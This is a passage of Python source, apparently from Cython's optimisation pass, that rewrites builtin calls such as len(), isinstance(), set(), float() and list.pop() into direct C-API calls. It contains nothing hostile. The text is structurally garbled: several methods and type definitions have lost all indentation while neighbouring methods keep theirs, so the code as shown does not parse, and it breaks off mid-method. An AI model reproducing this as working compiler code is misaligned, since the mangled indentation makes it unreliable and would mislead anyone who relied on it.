def _visit_PyTypeTestNode(self, node):
# disabled - appears to break assignments in some cases, and
# also drops a None check, which might still be required
"""Flatten redundant type checks after tree changes.
"""
old_arg = node.arg
self.visitchildren(node)
if old_arg is node.arg or node.arg.type != node.type:
return node
return node.arg
def _visit_TypecastNode(self, node):
# disabled - the user may have had a reason to put a type
# cast, even if it looks redundant to Cython
"""
Drop redundant type casts.
"""
self.visitchildren(node)
if node.type == node.operand.type:
return node.operand
return node
def visit_ExprStatNode(self, node):
"""
Drop useless coercions.
"""
self.visitchildren(node)
if isinstance(node.expr, ExprNodes.CoerceToPyTypeNode):
node.expr = node.expr.arg
return node
def visit_CoerceToBooleanNode(self, node):
"""Drop redundant conversion nodes after tree changes.
"""
self.visitchildren(node)
arg = node.arg
if isinstance(arg, ExprNodes.PyTypeTestNode):
arg = arg.arg
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.type in (PyrexTypes.py_object_type, Builtin.bool_type):
return arg.arg.coerce_to_boolean(self.current_env())
return node
    def visit_CoerceFromPyTypeNode(self, node):
        """Drop redundant conversion nodes after tree changes.

        Also, optimise away calls to Python's builtin int() and
        float() if the result is going to be coerced back into a C
        type anyway.
        """
        self.visitchildren(node)
        arg = node.arg
        if not arg.type.is_pyobject:
            # no Python conversion left at all, just do a C coercion instead
            if node.type == arg.type:
                return arg
            else:
                return arg.coerce_to(node.type, self.current_env())
        if isinstance(arg, ExprNodes.PyTypeTestNode):
            # a type test does not change the value => look through it
            arg = arg.arg
        if arg.is_literal:
            # numeric literal coerced to a C number => coerce it directly
            if (node.type.is_int and isinstance(arg, ExprNodes.IntNode) or
                    node.type.is_float and isinstance(arg, ExprNodes.FloatNode) or
                    node.type.is_int and isinstance(arg, ExprNodes.BoolNode)):
                return arg.coerce_to(node.type, self.current_env())
        elif isinstance(arg, ExprNodes.CoerceToPyTypeNode):
            if arg.type is PyrexTypes.py_object_type:
                if node.type.assignable_from(arg.arg.type):
                    # completely redundant C->Py->C coercion
                    return arg.arg.coerce_to(node.type, self.current_env())
        elif isinstance(arg, ExprNodes.SimpleCallNode):
            # int(x) / float(x) coerced back to C (see helper below)
            if node.type.is_int or node.type.is_float:
                return self._optimise_numeric_cast_call(node, arg)
        elif isinstance(arg, ExprNodes.IndexNode) and not arg.is_buffer_access:
            # bytes[int_index] coerced to a C char (see helper below)
            index_node = arg.index
            if isinstance(index_node, ExprNodes.CoerceToPyTypeNode):
                index_node = index_node.arg
            if index_node.type.is_int:
                return self._optimise_int_indexing(node, arg, index_node)
        return node
    # Signature of __Pyx_PyBytes_GetItemInt(): (bytes, Py_ssize_t, check_bounds)
    # -> char; returns (char)-1 with an exception check on error.
    PyBytes_GetItemInt_func_type = PyrexTypes.CFuncType(
        PyrexTypes.c_char_type, [
            PyrexTypes.CFuncTypeArg("bytes", Builtin.bytes_type, None),
            PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None),
            PyrexTypes.CFuncTypeArg("check_bounds", PyrexTypes.c_int_type, None),
            ],
        exception_value = "((char)-1)",
        exception_check = True)

    def _optimise_int_indexing(self, coerce_node, arg, index_node):
        """Replace a C coercion of bytes[int_index] by a direct call to
        __Pyx_PyBytes_GetItemInt(), avoiding the intermediate Python object.
        """
        env = self.current_env()
        # honour the 'boundscheck' compiler directive at the usage site
        bound_check_bool = env.directives['boundscheck'] and 1 or 0
        if arg.base.type is Builtin.bytes_type:
            if coerce_node.type in (PyrexTypes.c_char_type, PyrexTypes.c_uchar_type):
                # bytes[index] -> char
                bound_check_node = ExprNodes.IntNode(
                    coerce_node.pos, value=str(bound_check_bool),
                    constant_result=bound_check_bool)
                node = ExprNodes.PythonCapiCallNode(
                    coerce_node.pos, "__Pyx_PyBytes_GetItemInt",
                    self.PyBytes_GetItemInt_func_type,
                    args=[
                        arg.base.as_none_safe_node("'NoneType' object is not subscriptable"),
                        index_node.coerce_to(PyrexTypes.c_py_ssize_t_type, env),
                        bound_check_node,
                        ],
                    is_temp=True,
                    utility_code=UtilityCode.load_cached(
                        'bytes_index', 'StringTools.c'))
                if coerce_node.type is not PyrexTypes.c_char_type:
                    # cast the raw char result to the requested C type
                    node = node.coerce_to(coerce_node.type, env)
                return node
        return coerce_node
    def _optimise_numeric_cast_call(self, node, arg):
        """Replace an int(x)/float(x) builtin call whose result is being
        coerced to a C numeric type by a plain C typecast where safe.
        """
        function = arg.function
        if not isinstance(function, ExprNodes.NameNode) \
               or not function.type.is_builtin_type \
               or not isinstance(arg.arg_tuple, ExprNodes.TupleNode):
            return node
        args = arg.arg_tuple.args
        if len(args) != 1:
            return node
        func_arg = args[0]
        if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
            # look through the C -> Python coercion of the argument
            func_arg = func_arg.arg
        elif func_arg.type.is_pyobject:
            # play safe: Python conversion might work on all sorts of things
            return node
        if function.name == 'int':
            if func_arg.type.is_int or node.type.is_int:
                if func_arg.type == node.type:
                    return func_arg
                elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
                    return ExprNodes.TypecastNode(
                        node.pos, operand=func_arg, type=node.type)
        elif function.name == 'float':
            if func_arg.type.is_float or node.type.is_float:
                if func_arg.type == node.type:
                    return func_arg
                elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
                    return ExprNodes.TypecastNode(
                        node.pos, operand=func_arg, type=node.type)
        return node
def _error_wrong_arg_count(self, function_name, node, args, expected=None):
if not expected: # None or 0
arg_str = ''
elif isinstance(expected, basestring) or expected > 1:
arg_str = '...'
elif expected == 1:
arg_str = 'x'
else:
arg_str = ''
if expected is not None:
expected_str = 'expected %s, ' % expected
else:
expected_str = ''
error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
function_name, arg_str, expected_str, len(args)))
    ### generic fallbacks

    def _handle_function(self, node, function_name, function, arg_list, kwargs):
        """Fallback for function calls with no specific handler: leave the
        call node unchanged."""
        return node
    def _handle_method(self, node, type_name, attr_name, function,
                       arg_list, is_unbound_method, kwargs):
        """
        Try to inject C-API calls for unbound method calls to builtin types.
        While the method declarations in Builtin.py already handle this, we
        can additionally resolve bound and unbound methods here that were
        assigned to variables ahead of time.
        """
        if kwargs:
            return node
        if not function or not function.is_attribute or not function.obj.is_name:
            # cannot track unbound method calls over more than one indirection as
            # the names might have been reassigned in the meantime
            return node
        type_entry = self.current_env().lookup(type_name)
        if not type_entry:
            return node
        # rebuild the attribute access as an unbound C method reference
        method = ExprNodes.AttributeNode(
            node.function.pos,
            obj=ExprNodes.NameNode(
                function.pos,
                name=type_name,
                entry=type_entry,
                type=type_entry.type),
            attribute=attr_name,
            is_called=True).analyse_as_unbound_cmethod_node(self.current_env())
        if method is None:
            return node
        args = node.args
        if args is None and node.arg_tuple:
            args = node.arg_tuple.args
        call_node = ExprNodes.SimpleCallNode(
            node.pos,
            function=method,
            args=args)
        if not is_unbound_method:
            # bound call: the original object becomes the 'self' argument
            call_node.self = function.obj
        call_node.analyse_c_function_call(self.current_env())
        call_node.analysed = True
        return call_node.coerce_to(node.type, self.current_env())
    ### builtin types

    # Signature of PyDict_Copy(): dict -> dict.
    PyDict_Copy_func_type = PyrexTypes.CFuncType(
        Builtin.dict_type, [
            PyrexTypes.CFuncTypeArg("dict", Builtin.dict_type, None)
            ])

    def _handle_simple_function_dict(self, node, function, pos_args):
        """Replace dict(some_dict) by PyDict_Copy(some_dict).
        """
        if len(pos_args) != 1:
            return node
        arg = pos_args[0]
        if arg.type is Builtin.dict_type:
            # dict(None) raises a TypeError, so inject an explicit None check
            arg = arg.as_none_safe_node("'NoneType' is not iterable")
            return ExprNodes.PythonCapiCallNode(
                node.pos, "PyDict_Copy", self.PyDict_Copy_func_type,
                args = [arg],
                is_temp = node.is_temp
                )
        return node
PySequence_List_func_type = PyrexTypes.CFuncType(
Builtin.list_type,
[PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)])
def _handle_simple_function_list(self, node, function, pos_args):
"""Turn list(ob) into PySequence_List(ob).
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
return ExprNodes.PythonCapiCallNode(
node.pos, "PySequence_List", self.PySequence_List_func_type,
args=pos_args, is_temp=node.is_temp)
    # PyList_AsTuple(): list -> tuple (fails on None).
    PyList_AsTuple_func_type = PyrexTypes.CFuncType(
        Builtin.tuple_type, [
            PyrexTypes.CFuncTypeArg("list", Builtin.list_type, None)
            ])

    # PySequence_Tuple(): arbitrary iterable -> tuple.
    PySequence_Tuple_func_type = PyrexTypes.CFuncType(
        Builtin.tuple_type,
        [PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)])

    def _handle_simple_function_tuple(self, node, function, pos_args):
        """Replace tuple([...]) by PyList_AsTuple or PySequence_Tuple.
        """
        if len(pos_args) != 1:
            return node
        arg = pos_args[0]
        if arg.type is Builtin.tuple_type and not arg.may_be_none():
            # tuple(t) of a known non-None tuple is a no-op
            return arg
        if arg.type is Builtin.list_type:
            pos_args[0] = arg.as_none_safe_node(
                "'NoneType' object is not iterable")
            return ExprNodes.PythonCapiCallNode(
                node.pos, "PyList_AsTuple", self.PyList_AsTuple_func_type,
                args=pos_args, is_temp=node.is_temp)
        else:
            return ExprNodes.PythonCapiCallNode(
                node.pos, "PySequence_Tuple", self.PySequence_Tuple_func_type,
                args=pos_args, is_temp=node.is_temp)
    # PySet_New(): iterable -> set.
    PySet_New_func_type = PyrexTypes.CFuncType(
        Builtin.set_type, [
            PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
            ])

    def _handle_simple_function_set(self, node, function, pos_args):
        """Replace set([...]) by a set literal, or set(it) by PySet_New(it)."""
        if len(pos_args) != 1:
            return node
        if pos_args[0].is_sequence_constructor:
            # We can optimise set([x,y,z]) safely into a set literal,
            # but only if we create all items before adding them -
            # adding an item may raise an exception if it is not
            # hashable, but creating the later items may have
            # side-effects.
            args = []
            temps = []
            for arg in pos_args[0].args:
                if not arg.is_simple():
                    # evaluate non-trivial items up front via a temp
                    arg = UtilNodes.LetRefNode(arg)
                    temps.append(arg)
                args.append(arg)
            result = ExprNodes.SetNode(node.pos, is_temp=1, args=args)
            self.replace(node, result)
            # wrap temps in reverse order so they are evaluated first
            for temp in temps[::-1]:
                result = UtilNodes.EvalWithTempExprNode(temp, result)
            return result
        else:
            # PySet_New(it) is better than a generic Python call to set(it)
            return self.replace(node, ExprNodes.PythonCapiCallNode(
                node.pos, "PySet_New",
                self.PySet_New_func_type,
                args=pos_args,
                is_temp=node.is_temp,
                py_name="set"))
    # __Pyx_PyFrozenSet_New(): iterable (or NULL) -> frozenset.
    PyFrozenSet_New_func_type = PyrexTypes.CFuncType(
        Builtin.frozenset_type, [
            PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
            ])

    def _handle_simple_function_frozenset(self, node, function, pos_args):
        """Replace frozenset(it) by a call to __Pyx_PyFrozenSet_New(it)."""
        if not pos_args:
            # frozenset() -> __Pyx_PyFrozenSet_New(NULL)
            pos_args = [ExprNodes.NullNode(node.pos)]
        elif len(pos_args) > 1:
            return node
        elif pos_args[0].type is Builtin.frozenset_type and not pos_args[0].may_be_none():
            # frozenset(fs) of a known non-None frozenset is a no-op
            return pos_args[0]
        # PyFrozenSet_New(it) is better than a generic Python call to frozenset(it)
        return ExprNodes.PythonCapiCallNode(
            node.pos, "__Pyx_PyFrozenSet_New",
            self.PyFrozenSet_New_func_type,
            args=pos_args,
            is_temp=node.is_temp,
            utility_code=UtilityCode.load_cached('pyfrozenset_new', 'Builtins.c'),
            py_name="frozenset")
PyObject_AsDouble_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_double_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "((double)-1)",
exception_check = True)
def _handle_simple_function_float(self, node, function, pos_args):
"""Transform float() into either a C type cast or a faster C
function call.
"""
# Note: this requires the float() function to be typed as
# returning a C 'double'
if len(pos_args) == 0:
return ExprNodes.FloatNode(
node, value="0.0", constant_result=0.0
).coerce_to(Builtin.float_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('float', node, pos_args, '0 or 1')
return node
func_arg = pos_args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
func_arg = func_arg.arg
if func_arg.type is PyrexTypes.c_double_type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_numeric:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyObject_AsDouble",
self.PyObject_AsDouble_func_type,
args = pos_args,
is_temp = node.is_temp,
utility_code = load_c_utility('pyobject_as_double'),
py_name = "float")
    # PyNumber_Int(): generic object -> int (Python-level conversion).
    PyNumber_Int_func_type = PyrexTypes.CFuncType(
        PyrexTypes.py_object_type, [
            PyrexTypes.CFuncTypeArg("o", PyrexTypes.py_object_type, None)
            ])

    def _handle_simple_function_int(self, node, function, pos_args):
        """Transform int() into a faster C function call.
        """
        if len(pos_args) == 0:
            # int() -> 0, kept as a Python object like the builtin returns
            return ExprNodes.IntNode(node.pos, value="0", constant_result=0,
                                     type=PyrexTypes.py_object_type)
        elif len(pos_args) != 1:
            return node # int(x, base)
        func_arg = pos_args[0]
        if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
            return node # handled in visit_CoerceFromPyTypeNode()
        if func_arg.type.is_pyobject and node.type.is_pyobject:
            # generic object in, object out: use the C-API call directly
            return ExprNodes.PythonCapiCallNode(
                node.pos, "PyNumber_Int", self.PyNumber_Int_func_type,
                args=pos_args, is_temp=True)
        return node
def _handle_simple_function_bool(self, node, function, pos_args):
"""Transform bool(x) into a type coercion to a boolean.
"""
if len(pos_args) == 0:
return ExprNodes.BoolNode(
node.pos, value=False, constant_result=False
).coerce_to(Builtin.bool_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('bool', node, pos_args, '0 or 1')
return node
else:
# => !!<bint>(x) to make sure it's exactly 0 or 1
operand = pos_args[0].coerce_to_boolean(self.current_env())
operand = ExprNodes.NotNode(node.pos, operand = operand)
operand = ExprNodes.NotNode(node.pos, operand = operand)
# coerce back to Python object as that's the result we are expecting
return operand.coerce_to_pyobject(self.current_env())
### builtin functions
Pyx_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("bytes", PyrexTypes.c_char_ptr_type, None)
])
Pyx_Py_UNICODE_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("unicode", PyrexTypes.c_py_unicode_ptr_type, None)
])
PyObject_Size_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None)
],
exception_value="-1")
_map_to_capi_len_function = {
Builtin.unicode_type : "__Pyx_PyUnicode_GET_LENGTH",
Builtin.bytes_type : "PyBytes_GET_SIZE",
Builtin.list_type : "PyList_GET_SIZE",
Builtin.tuple_type : "PyTuple_GET_SIZE",
Builtin.dict_type : "PyDict_Size",
Builtin.set_type : "PySet_Size",
Builtin.frozenset_type : "__Pyx_PyFrozenSet_Size",
}.get
_ext_types_with_pysize = set(["cpython.array.array"])
    def _handle_simple_function_len(self, node, function, pos_args):
        """Replace len(char*) by the equivalent call to strlen(),
        len(Py_UNICODE) by the equivalent Py_UNICODE_strlen() and
        len(known_builtin_type) by an equivalent C-API call.
        """
        if len(pos_args) != 1:
            self._error_wrong_arg_count('len', node, pos_args, 1)
            return node
        arg = pos_args[0]
        if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
            # look through the C -> Python coercion of the argument
            arg = arg.arg
        if arg.type.is_string:
            new_node = ExprNodes.PythonCapiCallNode(
                node.pos, "strlen", self.Pyx_strlen_func_type,
                args = [arg],
                is_temp = node.is_temp,
                utility_code = UtilityCode.load_cached("IncludeStringH", "StringTools.c"))
        elif arg.type.is_pyunicode_ptr:
            new_node = ExprNodes.PythonCapiCallNode(
                node.pos, "__Pyx_Py_UNICODE_strlen", self.Pyx_Py_UNICODE_strlen_func_type,
                args = [arg],
                is_temp = node.is_temp)
        elif arg.type.is_pyobject:
            cfunc_name = self._map_to_capi_len_function(arg.type)
            if cfunc_name is None:
                arg_type = arg.type
                # some known extension types expose their length via Py_SIZE()
                if ((arg_type.is_extension_type or arg_type.is_builtin_type)
                    and arg_type.entry.qualified_name in self._ext_types_with_pysize):
                    cfunc_name = 'Py_SIZE'
                else:
                    return node
            # len(None) raises a TypeError; inject an explicit None check
            arg = arg.as_none_safe_node(
                "object of type 'NoneType' has no len()")
            new_node = ExprNodes.PythonCapiCallNode(
                node.pos, cfunc_name, self.PyObject_Size_func_type,
                args = [arg],
                is_temp = node.is_temp)
        elif arg.type.is_unicode_char:
            # a single unicode character always has length 1
            return ExprNodes.IntNode(node.pos, value='1', constant_result=1,
                                     type=node.type)
        else:
            return node
        if node.type not in (PyrexTypes.c_size_t_type, PyrexTypes.c_py_ssize_t_type):
            new_node = new_node.coerce_to(node.type, self.current_env())
        return new_node
    # Py_TYPE(): object -> its type (borrowed reference macro).
    Pyx_Type_func_type = PyrexTypes.CFuncType(
        Builtin.type_type, [
            PyrexTypes.CFuncTypeArg("object", PyrexTypes.py_object_type, None)
            ])

    def _handle_simple_function_type(self, node, function, pos_args):
        """Replace type(o) by a macro call to Py_TYPE(o).
        """
        if len(pos_args) != 1:
            return node
        # Py_TYPE() is a macro returning a borrowed reference, so no temp
        node = ExprNodes.PythonCapiCallNode(
            node.pos, "Py_TYPE", self.Pyx_Type_func_type,
            args = pos_args,
            is_temp = False)
        return ExprNodes.CastNode(node, PyrexTypes.py_object_type)
    # Common signature of all C-level type check functions: object -> bint.
    Py_type_check_func_type = PyrexTypes.CFuncType(
        PyrexTypes.c_bint_type, [
            PyrexTypes.CFuncTypeArg("arg", PyrexTypes.py_object_type, None)
            ])

    def _handle_simple_function_isinstance(self, node, function, pos_args):
        """Replace isinstance() checks against builtin types by the
        corresponding C-API call.
        """
        if len(pos_args) != 2:
            return node
        arg, types = pos_args
        temps = []
        if isinstance(types, ExprNodes.TupleNode):
            types = types.args
            if len(types) == 1 and not types[0].type is Builtin.type_type:
                return node # nothing to improve here
            if arg.is_attribute or not arg.is_simple():
                # evaluate the tested object only once
                arg = UtilNodes.ResultRefNode(arg)
                temps.append(arg)
        elif types.type is Builtin.type_type:
            types = [types]
        else:
            return node
        tests = []
        test_nodes = []
        env = self.current_env()
        for test_type_node in types:
            builtin_type = None
            if test_type_node.is_name:
                if test_type_node.entry:
                    entry = env.lookup(test_type_node.entry.name)
                    if entry and entry.type and entry.type.is_builtin_type:
                        builtin_type = entry.type
            if builtin_type is Builtin.type_type:
                # all types have type "type", but there's only one 'type'
                if entry.name != 'type' or not (
                        entry.scope and entry.scope.is_builtin_scope):
                    builtin_type = None
            if builtin_type is not None:
                # builtin type: use its dedicated C type check (e.g. PyList_Check)
                type_check_function = entry.type.type_check_function(exact=False)
                if type_check_function in tests:
                    # same check already emitted for an earlier entry
                    continue
                tests.append(type_check_function)
                type_check_args = [arg]
            elif test_type_node.type is Builtin.type_type:
                type_check_function = '__Pyx_TypeCheck'
                type_check_args = [arg, test_type_node]
            else:
                # unknown type expression: fall back to PyObject_IsInstance()
                if not test_type_node.is_literal:
                    test_type_node = UtilNodes.ResultRefNode(test_type_node)
                    temps.append(test_type_node)
                type_check_function = 'PyObject_IsInstance'
                type_check_args = [arg, test_type_node]
            test_nodes.append(
                ExprNodes.PythonCapiCallNode(
                    test_type_node.pos, type_check_function, self.Py_type_check_func_type,
                    args=type_check_args,
                    is_temp=True,
                    ))

        def join_with_or(a, b, make_binop_node=ExprNodes.binop_node):
            # combine the individual checks with short-circuiting 'or'
            or_node = make_binop_node(node.pos, 'or', a, b)
            or_node.type = PyrexTypes.c_bint_type
            or_node.wrap_operands(env)
            return or_node

        test_node = reduce(join_with_or, test_nodes).coerce_to(node.type, env)
        # wrap temps in reverse order so they are evaluated first
        for temp in temps[::-1]:
            test_node = UtilNodes.EvalWithTempExprNode(temp, test_node)
        return test_node
    def _handle_simple_function_ord(self, node, function, pos_args):
        """Unpack ord(Py_UNICODE) and ord('X').
        """
        if len(pos_args) != 1:
            return node
        arg = pos_args[0]
        if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
            if arg.arg.type.is_unicode_char:
                # ord(c) of a C unicode character is just an integer cast
                return ExprNodes.TypecastNode(
                    arg.pos, operand=arg.arg, type=PyrexTypes.c_int_type
                    ).coerce_to(node.type, self.current_env())
        elif isinstance(arg, ExprNodes.UnicodeNode):
            if len(arg.value) == 1:
                # constant-fold ord(u'X')
                return ExprNodes.IntNode(
                    arg.pos, type=PyrexTypes.c_int_type,
                    value=str(ord(arg.value)),
                    constant_result=ord(arg.value)
                    ).coerce_to(node.type, self.current_env())
        elif isinstance(arg, ExprNodes.StringNode):
            # constant-fold ord('X') for single-byte values only
            if arg.unicode_value and len(arg.unicode_value) == 1 \
                    and ord(arg.unicode_value) <= 255: # Py2/3 portability
                return ExprNodes.IntNode(
                    arg.pos, type=PyrexTypes.c_int_type,
                    value=str(ord(arg.unicode_value)),
                    constant_result=ord(arg.unicode_value)
                    ).coerce_to(node.type, self.current_env())
        return node
    ### special methods

    # __Pyx_tp_new(): (type, args tuple) -> new instance.
    Pyx_tp_new_func_type = PyrexTypes.CFuncType(
        PyrexTypes.py_object_type, [
            PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
            ])

    # __Pyx_tp_new_kwargs(): (type, args tuple, kwargs dict) -> new instance.
    Pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
        PyrexTypes.py_object_type, [
            PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
            PyrexTypes.CFuncTypeArg("kwargs", Builtin.dict_type, None),
            ])

    def _handle_any_slot__new__(self, node, function, args,
                                is_unbound_method, kwargs=None):
        """Replace 'exttype.__new__(exttype, ...)' by a call to exttype->tp_new()
        """
        obj = function.obj
        if not is_unbound_method or len(args) < 1:
            return node
        type_arg = args[0]
        if not obj.is_name or not type_arg.is_name:
            # play safe
            return node
        if obj.type != Builtin.type_type or type_arg.type != Builtin.type_type:
            # not a known type, play safe
            return node
        if not type_arg.type_entry or not obj.type_entry:
            if obj.name != type_arg.name:
                return node
            # otherwise, we know it's a type and we know it's the same
            # type for both - that should do
        elif type_arg.type_entry != obj.type_entry:
            # different types - may or may not lead to an error at runtime
            return node
        # remaining positional arguments become the tp_new() args tuple
        args_tuple = ExprNodes.TupleNode(node.pos, args=args[1:])
        args_tuple = args_tuple.analyse_types(
            self.current_env(), skip_children=True)
        if type_arg.type_entry:
            ext_type = type_arg.type_entry.type
            if (ext_type.is_extension_type and ext_type.typeobj_cname and
                    ext_type.scope.global_scope() == self.current_env().global_scope()):
                # known type in current module
                tp_slot = TypeSlots.ConstructorSlot("tp_new", '__new__')
                slot_func_cname = TypeSlots.get_slot_function(ext_type.scope, tp_slot)
                if slot_func_cname:
                    # call the slot function directly with a properly typed
                    # PyTypeObject* first argument
                    cython_scope = self.context.cython_scope
                    PyTypeObjectPtr = PyrexTypes.CPtrType(
                        cython_scope.lookup('PyTypeObject').type)
                    pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
                        PyrexTypes.py_object_type, [
                            PyrexTypes.CFuncTypeArg("type", PyTypeObjectPtr, None),
                            PyrexTypes.CFuncTypeArg("args", PyrexTypes.py_object_type, None),
                            PyrexTypes.CFuncTypeArg("kwargs", PyrexTypes.py_object_type, None),
                            ])
                    type_arg = ExprNodes.CastNode(type_arg, PyTypeObjectPtr)
                    if not kwargs:
                        kwargs = ExprNodes.NullNode(node.pos, type=PyrexTypes.py_object_type) # hack?
                    return ExprNodes.PythonCapiCallNode(
                        node.pos, slot_func_cname,
                        pyx_tp_new_kwargs_func_type,
                        args=[type_arg, args_tuple, kwargs],
                        is_temp=True)
        else:
            # arbitrary variable, needs a None check for safety
            type_arg = type_arg.as_none_safe_node(
                "object.__new__(X): X is not a type object (NoneType)")
        utility_code = UtilityCode.load_cached('tp_new', 'ObjectHandling.c')
        if kwargs:
            return ExprNodes.PythonCapiCallNode(
                node.pos, "__Pyx_tp_new_kwargs", self.Pyx_tp_new_kwargs_func_type,
                args=[type_arg, args_tuple, kwargs],
                utility_code=utility_code,
                is_temp=node.is_temp
                )
        else:
            return ExprNodes.PythonCapiCallNode(
                node.pos, "__Pyx_tp_new", self.Pyx_tp_new_func_type,
                args=[type_arg, args_tuple],
                utility_code=utility_code,
                is_temp=node.is_temp
                )
    ### methods of builtin types

    # __Pyx_PyObject_Append(): (obj, item) -> return code; -1 on error.
    PyObject_Append_func_type = PyrexTypes.CFuncType(
        PyrexTypes.c_returncode_type, [
            PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("item", PyrexTypes.py_object_type, None),
            ],
        exception_value="-1")

    def _handle_simple_method_object_append(self, node, function, args, is_unbound_method):
        """Optimistic optimisation as X.append() is almost always
        referring to a list.
        """
        # only applicable when the call's (None) result is discarded
        if len(args) != 2 or node.result_is_used:
            return node
        return ExprNodes.PythonCapiCallNode(
            node.pos, "__Pyx_PyObject_Append", self.PyObject_Append_func_type,
            args=args,
            may_return_none=False,
            is_temp=node.is_temp,
            result_is_used=False,
            utility_code=load_c_utility('append')
            )
    # __Pyx_PyByteArray_Append(): append a C int value; -1 on error.
    PyByteArray_Append_func_type = PyrexTypes.CFuncType(
        PyrexTypes.c_returncode_type, [
            PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("value", PyrexTypes.c_int_type, None),
            ],
        exception_value="-1")

    # __Pyx_PyByteArray_AppendObject(): append an arbitrary object; -1 on error.
    PyByteArray_AppendObject_func_type = PyrexTypes.CFuncType(
        PyrexTypes.c_returncode_type, [
            PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("value", PyrexTypes.py_object_type, None),
            ],
        exception_value="-1")

    def _handle_simple_method_bytearray_append(self, node, function, args, is_unbound_method):
        """Replace bytearray.append(value) by a direct C helper call, chosen
        by the (C or Python) type of the appended value."""
        if len(args) != 2:
            return node
        func_name = "__Pyx_PyByteArray_Append"
        func_type = self.PyByteArray_Append_func_type
        value = unwrap_coerced_node(args[1])
        if value.type.is_int or isinstance(value, ExprNodes.IntNode):
            # C integer value: append it directly
            value = value.coerce_to(PyrexTypes.c_int_type, self.current_env())
            utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
        elif value.is_string_literal:
            # single-character literal: append as a C char
            if not value.can_coerce_to_char_literal():
                return node
            value = value.coerce_to(PyrexTypes.c_char_type, self.current_env())
            utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
        elif value.type.is_pyobject:
            func_name = "__Pyx_PyByteArray_AppendObject"
            func_type = self.PyByteArray_AppendObject_func_type
            utility_code = UtilityCode.load_cached("ByteArrayAppendObject", "StringTools.c")
        else:
            return node
        new_node = ExprNodes.PythonCapiCallNode(
            node.pos, func_name, func_type,
            args=[args[0], value],
            may_return_none=False,
            is_temp=node.is_temp,
            utility_code=utility_code,
            )
        if node.result_is_used:
            new_node = new_node.coerce_to(node.type, self.current_env())
        return new_node
    # __Pyx_Py{Object,List}_Pop(): pop the last item.
    PyObject_Pop_func_type = PyrexTypes.CFuncType(
        PyrexTypes.py_object_type, [
            PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
            ])

    # __Pyx_Py{Object,List}_PopIndex(): pop the item at a given index.
    PyObject_PopIndex_func_type = PyrexTypes.CFuncType(
        PyrexTypes.py_object_type, [
            PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None),
            PyrexTypes.CFuncTypeArg("is_signed", PyrexTypes.c_int_type, None),
            ],
        has_varargs=True)  # to fake the additional macro args that lack a proper C type

    def _handle_simple_method_list_pop(self, node, function, args, is_unbound_method):
        """list.pop(): same as the generic object.pop() handler, but with a
        known list type."""
        return self._handle_simple_method_object_pop(
            node, function, args, is_unbound_method, is_list=True)
    def _handle_simple_method_object_pop(self, node, function, args, is_unbound_method, is_list=False):
        """Optimistic optimisation as X.pop([n]) is almost always
        referring to a list.
        """
        if not args:
            return node
        obj = args[0]
        if is_list:
            type_name = 'List'
            # list.pop(None) would raise an AttributeError at Python level
            obj = obj.as_none_safe_node(
                "'NoneType' object has no attribute '%s'",
                error="PyExc_AttributeError",
                format_args=['pop'])
        else:
            type_name = 'Object'
        if len(args) == 1:
            # x.pop() without an index
            return ExprNodes.PythonCapiCallNode(
                node.pos, "__Pyx_Py%s_Pop" % type_name,
                self.PyObject_Pop_func_type,
                args=[obj],
                may_return_none=True,
                is_temp=node.is_temp,
                utility_code=load_c_utility('pop'),
                )
        elif len(args) == 2:
            # x.pop(index): the index must fit into a Py_ssize_t
            index = unwrap_coerced_node(args[1])
            orig_index_type = index.type
            if not index.type.is_int:
                if is_list or isinstance(index, ExprNodes.IntNode):
                    index = index.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
                else:
                    return node
            elif not PyrexTypes.numeric_type_fits(index.type, PyrexTypes.c_py_ssize_t_type):
                return node
            # real type might still be larger at runtime
            if not orig_index_type.is_int:
                orig_index_type = index.type
            if not orig_index_type.create_to_py_utility_code(self.current_env()):
